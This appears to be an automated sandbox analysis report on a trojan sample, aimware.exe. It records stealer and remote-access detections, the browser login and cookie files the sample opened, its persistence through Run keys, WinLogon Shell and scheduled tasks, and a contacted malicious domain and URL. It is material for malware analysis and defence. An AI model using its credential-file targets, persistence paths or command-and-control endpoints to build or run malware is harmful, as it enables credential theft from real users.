Source: Yara match	File source: Process Memory Space: SurrogatesessionRuntimeBrokerDhcp.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wDyQbcxdSUUjszASb.exe PID: 3696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SurrogatesessionRuntimeBrokerDhcp.exe PID: 7428, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: aimware.exe, type: SAMPLE
Source: Yara match	File source: 0.3.aimware.exe.6ba32f5.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.75de2f5.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.6ba32f5.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.SurrogatesessionRuntimeBrokerDhcp.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.75de2f5.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1660085420.0000000007598000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1726770611.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1659465746.0000000006B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\spoolsv.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: aimware.exe, type: SAMPLE
Source: Yara match	File source: 0.3.aimware.exe.6ba32f5.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.75de2f5.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.6ba32f5.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.SurrogatesessionRuntimeBrokerDhcp.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.75de2f5.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\spoolsv.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000001D.00000002.2912163322.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2912163322.0000000003702000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2912163322.0000000003562000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1785396681.0000000012B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SurrogatesessionRuntimeBrokerDhcp.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wDyQbcxdSUUjszASb.exe PID: 3696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SurrogatesessionRuntimeBrokerDhcp.exe PID: 7428, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: aimware.exe, type: SAMPLE
Source: Yara match	File source: 0.3.aimware.exe.6ba32f5.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.75de2f5.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.6ba32f5.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.SurrogatesessionRuntimeBrokerDhcp.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.75de2f5.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1660085420.0000000007598000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1726770611.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1659465746.0000000006B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\spoolsv.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: aimware.exe, type: SAMPLE
Source: Yara match	File source: 0.3.aimware.exe.6ba32f5.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.75de2f5.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.6ba32f5.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.SurrogatesessionRuntimeBrokerDhcp.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.aimware.exe.75de2f5.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\spoolsv.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	137 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	3 Software Packing	NTDS	221 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	133 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
aimware.exe	62%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
aimware.exe	58%	Virustotal		Browse
aimware.exe	100%	Avira	VBS/Runner.VPG
aimware.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\BssArfvD.log	100%	Avira	TR/AVI.Agent.updqb
C:\Recovery\spoolsv.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\HIyZMmJW.log	100%	Avira	TR/AVI.Agent.updqb
C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe	100%	Avira	VBS/Runner.VPG
C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\KbMQbIAl.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\n17UfJYjYj.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\IqrHyRPU.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\ziWzrNQC.log	100%	Joe Sandbox ML
C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\EJYQaGiX.log	100%	Joe Sandbox ML
C:\Recovery\spoolsv.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	100%	Joe Sandbox ML
C:\Windows\System32\SecurityHealthSystray.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\KbMQbIAl.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\IqrHyRPU.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\BssArfvD.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\EJYQaGiX.log	8%	ReversingLabs
C:\Users\user\Desktop\FRcYkGBu.log	25%	ReversingLabs
C:\Users\user\Desktop\HIyZMmJW.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\IqrHyRPU.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KbMQbIAl.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\NUmFqbLL.log	25%	ReversingLabs
C:\Users\user\Desktop\ziWzrNQC.log	8%	ReversingLabs

Source	Detection	Scanner	Label
http://stethem.ru/	0%	Avira URL Cloud	safe
http://stethem.ru/ImageprocessLinuxgeneratorTestdleLocal.php	0%	Avira URL Cloud	safe
http://stethem.ru	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
stethem.ru	172.67.132.55	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://stethem.ru/ImageprocessLinuxgeneratorTestdleLocal.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	false		high
http://www.fontbureau.com/designers/?	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	false		high
http://www.fontbureau.com/designers?	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://stethem.ru/	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003249000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	false		high
http://www.tiro.com	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	false		high
http://www.fontbureau.com/designers	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	false		high
http://www.carterandcone.coml	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	false		high
http://www.jiyu-kobo.co.jp/	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
http://stethem.ru	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003562000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.000000000398A000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.000000000332A000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SurrogatesessionRuntimeBrokerDhcp.exe, 00000004.00000002.1780550988.0000000003512000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003249000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.132.55	stethem.ru	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581755
Start date and time:	2024-12-28 22:17:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	aimware.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@52/47@1/1
EGA Information:	Successful, ratio: 71.4%
HCA Information:	Successful, ratio: 58% Number of executed functions: 405 Number of non-executed functions: 93
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 92.122.16.236, 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SurrogatesessionRuntimeBrokerDhcp.exe, PID 7304 because it is empty
Execution Graph export aborted for target SurrogatesessionRuntimeBrokerDhcp.exe, PID 7428 because it is empty
Execution Graph export aborted for target wDyQbcxdSUUjszASb.exe, PID 7556 because it is empty
Execution Graph export aborted for target wDyQbcxdSUUjszASb.exe, PID 8084 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:18:28	API Interceptor	136011x Sleep call for process: wDyQbcxdSUUjszASb.exe modified
21:18:19	Task Scheduler	Run new task: spoolsv path: "C:\Recovery\spoolsv.exe"
21:18:19	Task Scheduler	Run new task: spoolsvs path: "C:\Recovery\spoolsv.exe"
21:18:19	Task Scheduler	Run new task: wDyQbcxdSUUjszASb path: "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
21:18:19	Task Scheduler	Run new task: wDyQbcxdSUUjszASbw path: "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
21:18:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
21:18:22	Task Scheduler	Run new task: SurrogatesessionRuntimeBrokerDhcp path: "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"
21:18:22	Task Scheduler	Run new task: SurrogatesessionRuntimeBrokerDhcpS path: "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"
21:18:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run spoolsv "C:\Recovery\spoolsv.exe"
21:18:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SurrogatesessionRuntimeBrokerDhcp "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"
21:18:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
21:18:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run spoolsv "C:\Recovery\spoolsv.exe"
21:19:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SurrogatesessionRuntimeBrokerDhcp "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"
21:19:11	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
21:19:20	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run spoolsv "C:\Recovery\spoolsv.exe"
21:19:29	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SurrogatesessionRuntimeBrokerDhcp "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"
21:19:46	Autostart	Run: WinLogon Shell "C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe"
21:19:54	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\google\wDyQbcxdSUUjszASb.exe"
21:20:04	Autostart	Run: WinLogon Shell "C:\Recovery\spoolsv.exe"
21:20:12	Autostart	Run: WinLogon Shell "C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe"
21:20:20	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310	Get hash	malicious	KnowBe4	Browse	1.1.1.1
	gdi32.dll	Get hash	malicious	LummaC	Browse	104.21.66.86
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Crosshair-X.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.165.214
	!Set-up..exe	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.26.3.16
	ZZ2sTsJFrt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	FB.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfh	Get hash	malicious	Unknown	Browse	104.26.9.163

Process:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
File Type:	ASCII text, with very long lines (517), with no line terminators
Category:	dropped
Size (bytes):	517
Entropy (8bit):	5.902244285143794
Encrypted:	false
SSDEEP:	12:R9qC/Wx7EixpPKAc5lxwZsiDxBI0IdVlPk:9WtdKTURDxBINzlc
MD5:	1F8C98E2E33FD441B47BEC09B80FBCF8
SHA1:	CFA7326CE019EB2E8C05E65D678E3ABAC9880397
SHA-256:	94387DCDD8E6579FA4FB4B8BC1230CFB828646B9F048B6CEDA016CB49247E570
SHA-512:	12AAFE09F8AFCAB7DEBEEB54276F991389A516BD83CB4AC6974BAD35A796B14520A6D595DDFCD012E24D6500AA051D7020AA5E2DD33547657EE8483462ED4F0D
Malicious:	false
